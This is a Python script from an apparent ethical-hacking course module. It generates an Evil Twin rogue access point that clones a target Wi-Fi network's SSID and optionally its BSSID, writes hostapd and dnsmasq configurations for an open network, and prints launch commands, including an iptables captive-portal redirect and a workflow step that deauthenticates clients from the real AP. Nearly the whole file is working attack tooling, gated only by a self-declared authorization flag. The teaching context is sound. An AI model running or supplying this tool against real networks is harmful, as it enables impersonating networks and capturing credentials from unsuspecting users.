#!/usr/bin/env python3
"""
04_attacks/05_evil_twin.py — Generate an Evil Twin AP configuration.

An Evil Twin is a rogue AP that impersonates a legitimate one by cloning
its SSID (and optionally BSSID). Clients connect to it instead of the real
AP — especially if the attacker has stronger signal or forces the client off
the real AP first (see 04_attacks/03_deauth.py).

⚠  REQUIRES AUTHORIZATION. Using this on public Wi-Fi is:
   - Illegal under PT Lei 109/2009, Art. 3 and Art. 7
   - A GDPR violation if you capture credentials
   - The plot of every hacker movie you've seen, without the cool music

This script does NOT automatically start the evil twin.
It generates configuration files and prints the exact commands to run.
You have to make the conscious choice to press Enter.

Session 3 use case:
    Clone the lab AP → observe that clients connect to us →
    demonstrate why HTTPS, certificate pinning, and WPA3 matter.

Usage:
    # Scan for targets first
    sudo python3 04_attacks/05_evil_twin.py --iface wlan1 --scan

    # Generate config for a specific AP
    sudo python3 04_attacks/05_evil_twin.py --iface wlan1 \\
        --bssid AA:BB:CC:DD:EE:FF --ssid "TargetNetwork" --channel 6 \\
        --i-have-authorization

Requirements: hostapd, dnsmasq (apt install hostapd dnsmasq)
              pip install scapy

CYBERS3C — Ethical Hacking Postgrad — Wi-Fi Module — Session 3
"""

import argparse
import os
import sys
import time

try:
    from scapy.all import Dot11, Dot11Beacon, Dot11Elt, RadioTap, sniff
except ImportError:
    print("[!] Scapy missing. pip install scapy")
    sys.exit(1)

# --- make wifi_utils (repo root) importable from any topic subfolder ---
import os, sys
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))

from wifi_utils import get_ssid, get_rssi, get_channel, require_root, list_interfaces


# ──────────────────────────────────────────────
# Scan for targets
# ──────────────────────────────────────────────

_scan_results: list[dict] = []
_seen: set[str] = set()


def _scan_handler(pkt):
    if not pkt.haslayer(Dot11Beacon):
        return
    dot11 = pkt[Dot11]
    bssid = dot11.addr3
    if not bssid or bssid.lower() in _seen:
        return
    _seen.add(bssid.lower())

    ssid    = get_ssid(pkt) or "<hidden>"
    channel = get_channel(pkt) or "?"
    rssi    = get_rssi(pkt)
    rssi_s  = f"{rssi:4d} dBm" if rssi else "   ? dBm"

    entry = {"bssid": bssid.lower(), "ssid": ssid, "channel": channel, "rssi": rssi}
    _scan_results.append(entry)

    idx = len(_scan_results)
    print(f"  [{idx:3d}] {bssid.lower()}  CH{str(channel):>3}  {rssi_s}  {ssid}")


def scan_targets(iface: str, duration: int = 15) -> dict | None:
    """
    Scan for nearby APs and let the user pick a target.
    Returns the selected AP dict or None.
    """
    print(f"\n[*] Scanning for APs on {iface} for {duration}s ...")
    print(f"    Run 01_setup/03_channel_hopper.py in another terminal for full coverage.\n")
    print(f"    {'#':>3}  {'BSSID':<19} {'CH':>4}  {'RSSI':>8}  SSID")
    print(f"    {'─'*3}  {'─'*19} {'─'*4}  {'─'*8}  {'─'*30}")

    sniff(
        iface=iface,
        prn=_scan_handler,
        store=False,
        timeout=duration,
        lfilter=lambda p: p.haslayer(Dot11Beacon),
    )

    if not _scan_results:
        print("[!] No APs found. Make sure you're in monitor mode and hopping channels.")
        return None

    print(f"\n  Found {len(_scan_results)} APs.")
    try:
        choice = int(input("  Enter number to target (0 to cancel): "))
        if choice == 0 or choice > len(_scan_results):
            return None
        return _scan_results[choice - 1]
    except (ValueError, KeyboardInterrupt):
        return None


# ──────────────────────────────────────────────
# Config generation
# ──────────────────────────────────────────────

def generate_hostapd_conf(
    iface: str,
    ssid: str,
    channel: int,
    bssid: str | None = None,
    open_network: bool = True,
) -> str:
    """
    Generate a minimal hostapd.conf that creates an open AP
    with the target SSID. Open is intentional here — we want
    clients to connect without a password (captive portal scenario).
    """
    lines = [
        f"# hostapd.conf — generated by 04_attacks/05_evil_twin.py",
        f"# Evil Twin for: {ssid}",
        f"",
        f"interface={iface}",
        f"driver=nl80211",
        f"ssid={ssid}",
        f"hw_mode={'g' if int(channel) <= 13 else 'a'}",
        f"channel={channel}",
        f"ignore_broadcast_ssid=0",
        f"",
        f"# Open network — clients connect without a password",
        f"# Add WPA2 config here if you're testing a pre-shared key scenario",
        f"auth_algs=1",
        f"",
        f"# Log to stdout so you can see who connects",
        f"logger_stdout=-1",
        f"logger_stdout_level=0",
    ]
    if bssid:
        lines.insert(6, f"bssid={bssid}   # spoofed to match real AP")

    return "\n".join(lines) + "\n"


def generate_dnsmasq_conf(iface: str, gw_ip: str = "10.0.0.1") -> str:
    """
    Generate a dnsmasq config for DHCP + DNS on the evil twin interface.
    Clients need an IP to do anything useful (like exposing credentials).
    """
    return f"""# dnsmasq.conf — generated by 04_attacks/05_evil_twin.py
interface={iface}
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,12h
dhcp-option=3,{gw_ip}
dhcp-option=6,{gw_ip}
log-queries
log-dhcp
"""


def print_run_instructions(
    iface: str,
    ssid: str,
    channel: int,
    conf_path: str,
    dnsmasq_path: str,
    mon_iface: str,
    out_dir: str,
):
    """
    Print the exact commands needed to launch the evil twin.
    We generate, you decide. One conscious Enter at a time.
    """
    # Find a managed-mode interface to suggest for IP config.
    # iface.replace("mon","") is fragile (wlan0mon→wlan0 is fine, but
    # alpha2mon→alpha2 is not a real name). Instead we check what's available.
    managed_ifaces = [
        i["name"] for i in list_interfaces()
        if i["mode"] != "monitor" and i["name"] != iface
    ]
    ap_iface_hint = (
        managed_ifaces[0] if managed_ifaces
        else "<your-managed-interface>"   # user must substitute this
    )

    gw_ip = "10.0.0.1"

    tmp_note = ""
    if out_dir == "/tmp":
        tmp_note = "\n  ⚠  Config files are in /tmp — they will be lost on reboot.\n"

    print(f"""
{'═'*60}
  EVIL TWIN CONFIGURATION — READY
{'═'*60}
{tmp_note}
  Target SSID   : {ssid}
  Channel       : {channel}
  AP interface  : {iface}

  Files written:
    {conf_path}
    {dnsmasq_path}

  To launch (run each in a separate terminal):

  ┌─ Terminal 1: start the AP ──────────────────────────┐
  │  sudo hostapd {conf_path}
  └──────────────────────────────────────────────────────┘

  ┌─ Terminal 2: configure the interface and DHCP ───────┐
  │  sudo ip addr add {gw_ip}/24 dev {iface}
  │  sudo ip link set {iface} up
  │  sudo dnsmasq -C {dnsmasq_path} --no-daemon
  └──────────────────────────────────────────────────────┘

  ┌─ Terminal 3: optional — watch who connects ──────────┐
  │  sudo tcpdump -i {iface} -n
  └──────────────────────────────────────────────────────┘

  ⚠  To add a captive portal redirect:
     sudo iptables -t nat -A PREROUTING -i {iface} \\
       -p tcp --dport 80 -j REDIRECT --to-port 8080
     (then run your web server on port 8080)

  ⚠  Clients connecting to this AP get no internet access by default.
     Add a NAT rule to forward traffic if needed for the demo.
{'═'*60}
""")


# ──────────────────────────────────────────────
# Authorization gate
# ──────────────────────────────────────────────

def _authorization_check(authorized: bool):
    if authorized:
        print("  [✓] Authorization declared. Generating configuration.\n")
        return
    print("""
  ╔═══════════════════════════════════════════════════════╗
  ║             AUTHORIZATION REQUIRED                    ║
  ╠═══════════════════════════════════════════════════════╣
  ║  An Evil Twin impersonates a legitimate network.      ║
  ║  It can capture credentials, bypass HTTPS (MITM),    ║
  ║  and disrupt wireless communications.                 ║
  ║                                                       ║
  ║  This is illegal without written authorization from   ║
  ║  the network owner.                                   ║
  ║                                                       ║
  ║  Add flag:  --i-have-authorization                    ║
  ╚═══════════════════════════════════════════════════════╝
""")
    sys.exit(1)


# ──────────────────────────────────────────────
# Entry point
# ──────────────────────────────────────────────

def main():
    require_root()

    parser = argparse.ArgumentParser(
        description="Evil Twin AP config generator — educational, not automated.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=(
            "This script generates config files and instructions.\n"
            "It does NOT automatically start the AP — you do that consciously.\n\n"
            "Workflow:\n"
            "  1. Scan with --scan to pick a target\n"
            "  2. Generate config with --bssid, --ssid, --channel\n"
            "  3. Read the printed instructions\n"
            "  4. Run 04_attacks/03_deauth.py to push clients off the real AP\n"
            "  5. Watch them connect to yours"
        ),
    )
    parser.add_argument("--iface",    required=True, help="AP interface (managed mode recommended)")
    parser.add_argument("--scan",     action="store_true",
                        help="Scan for APs and pick a target interactively")
    parser.add_argument("--ssid",     default=None, help="Target SSID to clone")
    parser.add_argument("--bssid",    default=None, help="Target BSSID to spoof (optional)")
    parser.add_argument("--channel",  type=int, default=6, help="AP channel (default: 6)")
    parser.add_argument("--out-dir",  default="/tmp", help="Directory for config files (default: /tmp)")
    parser.add_argument("--i-have-authorization", action="store_true", dest="authorized",
                        help="Confirm written authorization from network owner")
    args = parser.parse_args()

    print(f"\n=== 04_attacks/05_evil_twin.py ===\n")

    # Validate output directory before doing any real work
    if not os.path.isdir(args.out_dir):
        print(f"[!] Output directory does not exist: {args.out_dir}")
        sys.exit(1)

    target = None
    if args.scan:
        # Scan doesn't need authorization — it's passive
        target = scan_targets(args.iface)
        if not target:
            print("[*] No target selected. Exiting.")
            sys.exit(0)
        ssid    = target["ssid"]
        bssid   = target["bssid"]
        channel = target["channel"] if isinstance(target["channel"], int) else args.channel
    else:
        if not args.ssid:
            print("[!] Provide --ssid (or use --scan to pick a target interactively).")
            sys.exit(1)
        ssid    = args.ssid
        bssid   = args.bssid
        channel = args.channel

    _authorization_check(args.authorized)

    # Generate config files
    hostapd_conf  = generate_hostapd_conf(args.iface, ssid, channel, bssid)
    dnsmasq_conf  = generate_dnsmasq_conf(args.iface)

    conf_path     = os.path.join(args.out_dir, "evil_twin_hostapd.conf")
    dnsmasq_path  = os.path.join(args.out_dir, "evil_twin_dnsmasq.conf")

    with open(conf_path,    "w") as fh: fh.write(hostapd_conf)
    with open(dnsmasq_path, "w") as fh: fh.write(dnsmasq_conf)

    print_run_instructions(
        iface        = args.iface,
        ssid         = ssid,
        channel      = channel,
        conf_path    = conf_path,
        dnsmasq_path = dnsmasq_path,
        mon_iface    = args.iface,
        out_dir      = args.out_dir,
    )


if __name__ == "__main__":
    main()
